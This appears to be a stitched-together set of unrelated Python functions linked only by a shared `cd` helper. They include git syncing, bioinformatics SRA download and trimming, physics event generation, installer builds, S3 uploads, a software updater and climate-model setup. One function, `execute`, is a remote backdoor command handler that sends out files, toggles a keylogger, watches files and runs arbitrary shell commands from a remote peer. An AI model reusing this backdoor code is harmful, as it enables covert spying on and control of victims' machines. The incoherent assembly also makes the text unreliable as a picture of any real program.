def get_clither():
    """Get clither.

    Refreshes an existing checkout with `git pull`; otherwise clones the
    base repository into the base directory.
    """
    print('Getting clither...')
    already_cloned = os.path.exists(paths.clither_path)
    if already_cloned:
        # Existing checkout: just update it.
        run_cmd(cd(paths.clither_path), 'git pull')
    else:
        # Fresh clone into the base directory.
        run_cmd(cd(paths.base_dir), 'git clone ' + paths.clither_base_repo)
def execute(self, cmd):
    """Dispatch one backdoor command string and record its textual result.

    Recognized prefixes: 'cd ', 'GET ', 'KEYON', 'KEYOFF', 'WATCH ',
    'RMWATCH ', 'CLOSE'; anything else is run through the shell.
    Non-empty results are printed and passed to self.saveResult().
    """
    print("Executing command: {}".format(cmd))
    result = ""
    if cmd[:3] == 'cd ':
        try:
            helpers.cd(cmd[3:])
        except OSError as e:
            result = str(e)
    elif cmd[:4] == 'GET ':
        filename = cmd[4:]
        if not os.path.exists(filename):
            result = "File doesn't exist\n"
        else:
            self.fileTransfer.sendFile(filename)
    elif cmd[:5] == 'KEYON':
        if self.keylogger.start():
            result = "Started keylogger\n"
        else:
            result = "Keylogger started already\n"
    elif cmd[:6] == 'KEYOFF':
        if self.keylogger.stop():
            result = "Stopped keylogger\n"
        else:
            result = "Keylogger already stopped\n"
    elif cmd[:6] == 'WATCH ':
        self.addWatch(cmd[6:])
        result = "Added watch\n"
    elif cmd[:8] == 'RMWATCH ':
        if self.removeWatch(cmd[8:]):
            result = "Removed watch\n"
        else:
            result = "File or directory don't have watch\n"
    elif cmd[:5] == 'CLOSE':
        print("Backdoor closed...\n")
        sys.exit(0)
    else:
        # SECURITY NOTE: cmd comes from a remote peer and is run with
        # shell=True by design (this is the generic-command fallback).
        proc = subprocess.Popen(cmd, shell=True,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        # BUGFIX: sequential stdout.read()/stderr.read() can deadlock when
        # one pipe's buffer fills; communicate() drains both concurrently.
        out, err = proc.communicate()
        result = out + err
    if result != "":
        print("Result: %s" % result)
        self.saveResult(result)
    time.sleep(0.1)
def trim_sra():
    """Run trim_galore on the downloaded SRA fastq file(s) in <dir>/SRA_trimmed.

    Relies on module globals `arguments` (parsed CLI args) and `SRA`
    (the accession being processed).
    """
    # check for SRA folder and file existence
    if not os.path.exists(arguments.dir + '/SRA'):
        print('''There is no directory /SRA in {dir}. Either create this
directory in {dir} or use the --download flag to create the directory
and download SRA files to it'''.format(dir=arguments.dir))
    # BUGFIX: was os.path.exists(os.path.exists(...)) — the nested call
    # returned a bool, so the outer exists() was always checking False.
    if not os.path.exists(arguments.dir + '/SRA/' + SRA):
        print("There is no file {file} in {dir}".
              format(file=SRA, dir=arguments.dir))
    # check if SRA_trimmed directory exists, if not create it
    if not os.path.exists(arguments.dir + '/SRA_trimmed'):
        print(time.strftime('[%a, %I:%M]'), 'Creating directory /SRA_trimmed..')
        os.makedirs(arguments.dir + '/SRA_trimmed')
    with cd(arguments.dir + '/SRA_trimmed/'):
        print(time.strftime("[%a, %I:%M]"),
              "Trimming " + SRA + ".fastq.gz ...")
        # BUGFIX: ">" in the argv list was passed to trim_galore literally
        # (call() does not use a shell); redirect stdout explicitly instead.
        log_path = "../log/trim_galore_output_{}.txt".format(
            time.strftime("[%a:%I:%M]"))
        # call trim_galore using the SRA accession. Pass flag if paired.
        with open(log_path, 'w') as log:
            if arguments.paired:
                file_1 = arguments.dir + '/SRA/' + SRA + "_1.fastq.gz"
                # BUGFIX: was assigned to file_1 twice, leaving file_2
                # undefined (NameError on the next line).
                file_2 = arguments.dir + '/SRA/' + SRA + "_2.fastq.gz"
                call(["trim_galore", file_1, file_2, "--paired"], stdout=log)
            else:
                call(["trim_galore",
                      arguments.dir + '/SRA/' + SRA + ".fastq.gz"],
                     stdout=log)
def generate_events_locally(self, nruns=1, nevents=10000):
    """Generate events on the local machine, pruning bulky intermediates.

    Runs the generator `nruns` times inside the run directory, removing
    parton/pythia stages and Delphes ROOT files after each run.
    """
    self.setup_for_generation(nruns, nevents)
    with cd(self.directory):
        for _ in range(nruns):
            sp.call(['./bin/generate_events', '--laststep=delphes', '-f'])
            # Drop the intermediate event stages to save disk space.
            for stage in ('parton', 'pythia'):
                sp.call(['./bin/madevent', 'remove', 'all', stage, '-f'])
            sp.call('rm -rf Events/run_*/tag_*_delphes_events.root', shell=True)
def call_update(plp_update_to_version):
    # Up-/downgrade the printsrv package to the requested version.
    # Refuses a no-op update and any target below 1.0.4, then downloads the
    # GitHub release zip into BASEDIR/update, writes a self-deleting
    # update.bat that swaps the unpacked files into place and restarts
    # printsrv, and finally exec's that script (replacing this process).
    if LooseVersion(plp_update_to_version) == LooseVersion(PACKAGE_JSON_DATA['version']):
        # Already at the requested version -- nothing to do.
        print '\n\nRefusing to update. Allready at {0}'.format(PACKAGE_JSON_DATA['version'])
        return
    if LooseVersion(plp_update_to_version) < LooseVersion('1.0.4'):
        # Versions below the 1.0.4 floor are unsupported.
        print '\n\nRefusing to {2} from {0} to {1}. Anything less than 1.0.4 is just not acceptable.'.format(
            PACKAGE_JSON_DATA['version'],
            plp_update_to_version,
            'downgrade' if LooseVersion(plp_update_to_version) < LooseVersion(PACKAGE_JSON_DATA['version']) else 'upgrade'
        )
        return
    print '\n\n{2}grading from {0} to {1}.'.format(
        PACKAGE_JSON_DATA['version'],
        plp_update_to_version,
        'Down' if LooseVersion(plp_update_to_version) < LooseVersion(PACKAGE_JSON_DATA['version']) else 'Up'
    )
    # GitHub release asset URL for the requested version.
    REMOTE_PLEVI = 'https://github.com/Piletilevi/printsrv/releases/download/{0}/plevi_{0}.zip'.format(plp_update_to_version)
    update_dir = path.join(BASEDIR, 'update')
    LOCAL_PLEVI = path.join(update_dir, path.basename(REMOTE_PLEVI))
    ensure_dir(update_dir)
    with cd(BASEDIR):
        # Batch script executed after this process exits: moves unpacked
        # files over the current install, restarts printsrv, deletes itself.
        with open('update.bat', 'w') as infile:
            infile.write('cd /d {0}\n'.format(update_dir))
            infile.write('for %%i in (*) do move "%%i" ..\n')
            infile.write('for /d %%i in (*) do rmdir "../%%i" /s /q\n')
            infile.write('for /d %%i in (*) do move "%%i" ..\n')
            infile.write('cd ..\n')
            infile.write('rmdir update /s /q\n')
            infile.write('printsrv.exe "{0}"\n'.format(PLP_FILENAME))
            # NOTE(review): this .format() is a no-op (no placeholders).
            infile.write('del update.bat\n'.format(PLP_FILENAME))
    with cd(update_dir):
        if dlfile(REMOTE_PLEVI, LOCAL_PLEVI):
            print 'Unpacking {0}'.format(LOCAL_PLEVI)
            with ZipFile(LOCAL_PLEVI, 'r') as z:
                z.extractall(path.join(path.dirname(LOCAL_PLEVI)))
            remove(LOCAL_PLEVI)
        else:
            # Download failed; abort without touching the install.
            exit(1)
    # Replace the current process with the update script.
    execl('update.bat', 'update.bat')
    exit(0) # Will not reach this line, but for sake of readability.
def clone_addons(addons):
    """Clone addons.

    args:
        addons: (list) Addon repository URLs to clone or update.
    """
    print('Cloning addons...')
    used_addons = set()
    # Strip the URL scheme and an optional trailing ".git" suffix.
    # BUGFIX: the dot is now escaped — the original r'(.git)*$' matched any
    # character before "git" (e.g. "agit"), mangling some URLs. Compiling is
    # also hoisted out of the loop (it is loop-invariant).
    git_repo_comp = re.compile(r'https?://(.+?)(\.git)*$')
    for url in addons:
        addon_name = os.path.basename(url)
        match = git_repo_comp.match(url)
        # Fall back to the basename when the URL doesn't look like a repo URL.
        truncated_url = addon_name
        if match:
            truncated_url, _ = match.groups()
        new_addon_name = get_new_path(
            truncated_url, paths.custom_addons_path, '')
        print('add ' + new_addon_name)
        used_addons.add(new_addon_name)
        if os.path.exists(new_addon_name):
            # Already cloned: refresh and move on.
            run_cmd(cd(new_addon_name), 'git pull')
            continue
        run_cmd(cd(paths.custom_addons_path), 'git clone ' + url)
        addon_path = os.path.join(paths.custom_addons_path, addon_name)
        os.rename(addon_path, new_addon_name)  # TODO(xnz): abstract to helper
        print('rename {0} to {1}'.format(addon_path, new_addon_name))
    # Warn about directories present on disk but not produced by this run.
    existing_addons = set(
        os.path.join(paths.custom_addons_path, entry)
        for entry in get_dir_list(paths.custom_addons_path))
    extra_addons = existing_addons - used_addons
    if extra_addons:
        print('You have untracked addons: ' + ', '.join(extra_addons))
def do(self):
    """Sync the source checkout to the remote branch tip and record its revision.

    Checks out the configured branch, discards local changes if the tree is
    dirty, fast-forwards to the remote, refreshes submodules, and stores the
    short HEAD hash in self.revision.
    """
    with helpers.cd(self.source):
        branch = getattr(self, 'branch', 'master')
        remote = getattr(self, 'remote', 'origin')
        dirty = helpers.run('git', 'status', '--porcelain',
                            verbose=False).strip()
        helpers.run('git', 'checkout', branch)
        if dirty:
            # Working tree had local modifications — throw them away.
            helpers.run('git', 'reset', '--hard', branch)
        helpers.run('git', 'fetch', remote, branch)
        helpers.run('git', 'merge', '--ff-only', '%s/%s' % (remote, branch))
        for sub_step in ('init', 'update'):
            helpers.run('git', 'submodule', sub_step)
        self.revision = helpers.run('git', 'rev-parse', '--short', 'HEAD',
                                    verbose=False).strip()
        if self.options.get('dest'):
            # Archive support is intentionally unfinished; everything below
            # the raise is unreachable placeholder code.
            raise Exception("Haven't figured out the proper set of `git archive` commands yet")
            helpers.run('git', 'archive', '-o',
                        self.options.get('dest') / ('%s.zip' % self.revision),
                        branch)
            with helpers.cd(self.options.get('dest')):
                # TODO: this doesn't work.
                helpers.run('unzip', 'archive.zip')
def do(self):
    """Check out, hard-reset if dirty, and fast-forward the source repo.

    Leaves the short HEAD hash in self.revision. The archive path guarded by
    options['dest'] is an unfinished placeholder that raises immediately.
    """
    with helpers.cd(self.source):
        branch = getattr(self, 'branch', 'master')
        remote = getattr(self, 'remote', 'origin')
        status_output = helpers.run('git', 'status', '--porcelain',
                                    verbose=False)
        has_local_changes = status_output.strip()
        helpers.run('git', 'checkout', branch)
        if has_local_changes:
            helpers.run('git', 'reset', '--hard', branch)
        tracking_ref = '%s/%s' % (remote, branch)
        helpers.run('git', 'fetch', remote, branch)
        helpers.run('git', 'merge', '--ff-only', tracking_ref)
        helpers.run('git', 'submodule', 'init')
        helpers.run('git', 'submodule', 'update')
        head = helpers.run('git', 'rev-parse', '--short', 'HEAD',
                           verbose=False)
        self.revision = head.strip()
        if self.options.get('dest'):
            raise Exception(
                "Haven't figured out the proper set of `git archive` commands yet"
            )
            # Unreachable until the raise above is removed.
            helpers.run(
                'git', 'archive', '-o',
                self.options.get('dest') / ('%s.zip' % self.revision),
                branch)
            with helpers.cd(self.options.get('dest')):
                # TODO: this doesn't work.
                helpers.run('unzip', 'archive.zip')
def download_sra():
    """Download SRA fastq file(s) into <dir>/SRA with fastq-dump.

    Relies on module globals `arguments` (parsed CLI args) and `SRA`
    (the accession to download).
    """
    # check if SRA directory exists, if not create it
    if not os.path.exists(arguments.dir + '/SRA'):
        print(time.strftime('[%a, %I:%M]'), 'Creating directory /SRA..')
        os.makedirs(arguments.dir + '/SRA')
    # move to newly created directory, download SRA files
    with cd(arguments.dir + '/SRA'):
        print(time.strftime("[%a, %I:%M]"), "Downloading SRA file: " + SRA
              + " to " + arguments.dir + '/SRA')
        # BUGFIX: ">" in the argv list was handed to fastq-dump literally
        # (call() does not invoke a shell); redirect stdout explicitly.
        # Also "-gzip" -> "--gzip": sra-tools uses the double-dash long form.
        log_path = "../log/fastq_dump_log_{}.txt".format(
            time.strftime("[%a:%I:%M]"))
        # call fastq-dump using the SRA accession.
        with open(log_path, 'w') as log:
            if arguments.paired:
                call(["fastq-dump", "--split-files", SRA, "--gzip"],
                     stdout=log)
            else:
                call(["fastq-dump", SRA, "--gzip"], stdout=log)
def run_analysis_on_originals():
    """Build the CutAndCountAnalysis binary and run it over the signal samples.

    Writes the analysis C++ for zero m_R / m_T_R, compiles it, then analyzes
    each process in the module-level `signals` list.
    """
    analysis = CutAndCountAnalysis()
    m_R = 0.0
    m_T_R = 0.0
    analysis.write_analysis_cpp('CutAndCountAnalysis', m_R, m_T_R)
    with cd('CutAndCountAnalysis/Build'):
        # BUGFIX: the original opened os.devnull here without ever using or
        # closing it (a leaked file handle); the dead open() is removed.
        # A stray trailing `"""` (unterminated string) was also dropped.
        sp.call(['make'])
    analysis_name = str(int(m_R)) + '_GeV_m_R_' + str(
        int(m_T_R)) + '_GeV_m_T_R'
    for process in tqdm(signals, ncols=60):
        process.make_original_input_list('CutAndCountAnalysis')
        process.analyze_originals('CutAndCountAnalysis', analysis_name)
def do(self):
    # Compile the installer: run makensis (verbose level 4) on the installer
    # script, from the script's own directory so relative includes resolve.
    with helpers.cd(self.installer_script.parent):
        print '*** running makensis with options %r ***' % (self.options,)
        helpers.run(self.nsis_exe, '/V4', self.installer_script)
def do(self):
    """Run the NSIS compiler (verbose level 4) on the build script.

    Changes into the script's parent directory first so that relative
    includes inside the script resolve correctly.
    """
    script = self.script
    with helpers.cd(script.parent):
        helpers.run(self.path_nsis, '/V4', script)
def do(self):
    # Upload the working directory's contents to S3 under the build
    # identifier prefix.
    with helpers.cd(self.path):
        self.upload_dir_to_s3(self.build_identifier)
        print '*** done uploading ***'
def setup_for_generation(self, nruns, nevents):
    """Prepare the run directory: copy cards, write the PBS script, and
    patch the run card with the requested event count."""
    self.copy_cards()
    with cd(self.directory):
        self.write_pbs_script(nruns)
        run_card = 'Cards/run_card.dat'
        modify_file(run_card, set_beam_energy)
        # Replace the "<N> = nev" entry with the requested event count.
        patch_nevents = lambda text: re.sub(
            r'\d* = nev', str(nevents) + " = nev", text)
        modify_file(run_card, patch_nevents)
def create_run(settings=settings, experiment=settings.experiment):
    """Set up a coupled PISM/POEM experiment directory from templates.

    Copies the coupling template tree, prepares the PISM and POEM
    sub-directories, renders run scripts from jinja2 templates and — when
    restarting from a previous coupled run — carries over flux, reference
    and MOM restart files from that run.

    NOTE(review): fixed `warmings.warm(...)` -> `warnings.warn(...)`, which
    raised NameError whenever the MOM restart directory was missing (the
    correct spelling is already used in the sibling branches).
    """
    # copy template structure to new experiment location
    try:
        shutil.copytree(settings.coupl_template_dir, settings.experiment_dir,
                        symlinks=True)
    except OSError as error:
        print(error)
        print("Choose a different experiment name or remove "
              + settings.experiment_dir)
        sys.exit(1)
    for d in ['x_MOM-to-PISM', 'x_PISM-to-MOM']:
        dir_path = os.path.join(settings.experiment_dir, d)
        if not os.path.exists(dir_path):
            os.mkdir(dir_path)
    print(f" > created experiment directory {settings.experiment_dir}")

    # create main coupling script from template
    create_script_from_template(settings, "run_coupled.sh.jinja2")

    # prepare PISM subdirectory
    PISM_folders = ['initdata', 'prerun', 'results']
    for f in PISM_folders:
        fpath = os.path.join(settings.pism_exp_dir, f)
        if not os.path.exists(fpath):
            os.makedirs(fpath)
            print(f" - created directory PISM/{f}")
    # copy PISM binary to experiment dir
    if not os.path.exists(settings.pism_exp_bin_dir):
        os.makedirs(settings.pism_exp_bin_dir)
    shutil.copy2(settings.pism_sys_bin, settings.pism_exp_bin_dir)
    print(f" - copied PISM binary {settings.pism_sys_bin} to PISM/bin")
    # copy PISM input files to PISM/initdata/
    pism_input_files_to_copy = [
        settings.pism_infile_path,
        settings.pism_atm_data_path,
        settings.pism_ocn_data_path,
        settings.pism_ocnkill_data_path]
    for f in pism_input_files_to_copy:
        shutil.copy2(f, os.path.join(settings.pism_exp_dir, 'initdata'))
        print(f" - copied PISM input file {f} to PISM/initdata")

    # prepare pism config_override file
    pism_config_dict = get_pism_config_as_dict(settings)
    check_if_override_is_in_config(settings, pism_config_dict)
    create_script_from_template(settings, "config_override.cdl.jinja2")
    cmd = "ncgen3 " + os.path.join(settings.pism_exp_dir, "initdata",
                                   "config_override.cdl") \
        + " -o " + os.path.join(settings.pism_exp_dir, "initdata",
                                "config_override.nc")
    os.system(cmd)
    print(" - created PISM/config_override.nc from PISM/config_override.cdl")
    # create pism run scripts from template
    create_script_from_template(settings, "pism_prerun_script.sh.jinja2")
    create_script_from_template(settings, "pism_run_script.sh.jinja2")

    ## prepare POEM subdirectory
    # delete all content first
    for filename in os.listdir(settings.poem_exp_dir):
        file_path = os.path.join(settings.poem_exp_dir, filename)
        try:
            if os.path.isfile(file_path) or os.path.islink(file_path):
                os.unlink(file_path)
            elif os.path.isdir(file_path):
                shutil.rmtree(file_path)
        except Exception as e:
            print(f'Failed to delete {file_path}. Reason: {e}')
    # copy from template (preserving symlinks)
    dist.copy_tree(settings.poem_template_dir, settings.poem_exp_dir,
                   preserve_symlinks=1, update=1, verbose=1)
    print(f" - copied POEM template {settings.poem_template_dir} to POEM")

    # a new coupled run (not restarting from a previous coupled run)
    if settings.coupled_restart == False:
        # copy inital PISM-to-MOM fluxes for the first coupling iteration
        shutil.copy2(settings.pism_to_mom_flux_init_path,
                     os.path.join(settings.experiment_dir, 'x_PISM-to-MOM'))
        print(f" - copied initial PISM-to-MOM flux file "
              f"{settings.pism_to_mom_flux_init_file} from "
              f"{settings.pism_to_mom_flux_init_path} for ice to ocean "
              f"fluxes in first coupling iteration")

    # further stuff to do when doing a restart from a previous coupled run
    if settings.coupled_restart == True:
        # copy PISM-to-MOM fluxes file if doing a restart from previous run
        shutil.copy2(settings.pism_to_mom_flux_restart_path,
                     os.path.join(settings.experiment_dir, 'x_PISM-to-MOM'))
        print(f" - copied PISM-to-MOM flux file "
              f"{settings.pism_to_mom_flux_restart_file} from "
              f"{settings.restart_dir} to restart from previous run")

        # copy MOM restart files from previous run
        poem_input_dir = os.path.join(settings.poem_exp_dir, 'INPUT')
        poem_restart_files_dir = os.path.join(settings.restart_dir,
                                              'POEM/INPUT')
        if os.path.exists(poem_restart_files_dir):
            with helpers.cd(str(poem_restart_files_dir)):
                cmd = f"for i in *.res*; do rm {poem_input_dir}/$i; "\
                      f"cp -a $i {poem_input_dir} ; done"
                subprocess.call(cmd, shell=True)
            print(f" - copied MOM restart files from {poem_restart_files_dir} "
                  "to POEM/INPUT")
        else:
            # BUGFIX: was `warmings.warm(...)` (NameError at runtime).
            warnings.warn(f"WARNING: path {poem_restart_files_dir} does not "
                          f"exist! Need to copy MOM restart files to INPUT dir by "
                          f"hand...")

        if (settings.do_ocean_tracer_anomaly == True
                and settings.use_ocean_tracer_anomaly_from_prev_run == True):
            # copy ocean tracer anomaly reference file from previous run
            if os.path.exists(settings.ocean_tracer_anomaly_reference_path):
                shutil.copy2(settings.ocean_tracer_anomaly_reference_path,
                             os.path.join(settings.experiment_dir,
                                          'x_MOM-to-PISM'))
                print(f" - copied ocean tracer anomaly reference file "
                      f"{settings.ocean_tracer_anomaly_reference_file} of "
                      f"{settings.restart_dir} to compute ocean tracer anomalies "
                      f"to same reference like in previous run")
            else:
                warnings.warn(f"path {settings.ocean_tracer_anomaly_reference_path} "
                              f"does not exist!")

        if (settings.do_ocean_sealevel_anomaly == True
                and settings.use_ocean_sealevel_anomaly_from_prev_run == True):
            # copy ocean sealevel anomaly reference file from previous run
            if os.path.exists(settings.ocean_sealevel_anomaly_reference_path):
                shutil.copy2(settings.ocean_sealevel_anomaly_reference_path,
                             os.path.join(settings.experiment_dir,
                                          'x_MOM-to-PISM'))
                print(f" - copied ocean sealevel anomaly reference file "
                      f"{settings.ocean_sealevel_anomaly_reference_file} of "
                      f"{settings.restart_dir} to compute ocean sealevel anomalies "
                      f"to same reference like in previous run")
            else:
                warnings.warn(f"path {settings.ocean_sealevel_anomaly_reference_path} "
                              f"does not exist!")
    # [end] if settings.coupled_restart==True

    # copying PISM runoff reference file for calculation of ice to ocean
    # runoff with sea level impact
    if settings.do_runoff_slc == True:
        if settings.runoff_reference_surf_accum == True:
            if settings.coupled_restart == True:
                # copy ice-to-ocean runoff reference file from previous run
                if os.path.exists(settings.runoff_reference_restart_path):
                    shutil.copy2(settings.runoff_reference_restart_path,
                                 os.path.join(settings.experiment_dir,
                                              'x_PISM-to-MOM'))
                    print(f" - copied PISM to MOM runoff reference file "
                          f"{settings.runoff_reference_restart_path} "
                          f"from previous run (computed from PISM surface "
                          f"accumulation flux) to identify the part of ice "
                          f"to ocean runoff which changes sea level in the "
                          f"ocean")
                else:
                    warnings.warn(f"WARNING: tried to copy PISM runoff "
                                  f"reference file, but path "
                                  f"{settings.runoff_reference_restart_path} "
                                  f"does not exist!")
        else:  # runoff_reference_surf_accum == False
            # copy pre-computed ice-to-ocean runoff reference file
            if os.path.exists(settings.runoff_reference_path):
                shutil.copy2(settings.runoff_reference_path,
                             os.path.join(settings.experiment_dir,
                                          'x_PISM-to-MOM'))
                print(f" - copied pre-computed PISM runoff reference file "
                      f"{settings.runoff_reference_path} to identify to "
                      f"part of ice to ocean runoff which changes sea level "
                      f"in the ocean")
            else:
                warnings.warn(f"WARNING: tried to copy PISM runoff reference file, "
                              f"but path {settings.runoff_reference_path} does "
                              f"not exist!")
def do(self):
    # Compile the installer: run makensis (verbose level 4) on the installer
    # script, from the script's directory so relative includes resolve.
    with helpers.cd(self.installer_script.parent):
        print '*** running makensis with options %r ***' % (self.options, )
        helpers.run(self.nsis_exe, '/V4', self.installer_script)
def run_clither(args):
    """Launch clither.py with the given argument list.

    An empty argument list defaults to a full custom setup and install.
    """
    if args:
        flags = ' '.join(args)
    else:
        # No explicit args: run the default setup/install sequence.
        flags = '--setup_custom --install'
    run_cmd(cd(paths.clither_path), './clither.py ' + flags)
def do(self):
    """Upload the 'install' directory tree to S3, unless cancelled.

    Uploads uncompressed, with MIME types set per file.
    """
    if not self.cancel:
        with helpers.cd(self.path):
            self.upload_dir_to_s3('install', compress=False, mimetypes=True)
def generate_events(self, nruns=1, nevents=10000):
    """Prepare the run area and submit the PBS event-generation job.

    qsub's stdout is discarded; the job itself runs asynchronously on the
    cluster.
    """
    self.setup_for_generation(nruns, nevents)
    with cd(self.directory):
        # BUGFIX: the original opened os.devnull without closing it (leaked
        # file handle); a context manager guarantees it is closed.
        with open(os.devnull, 'w') as devnull:
            sp.call(['qsub', 'submit.pbs'], stdout=devnull)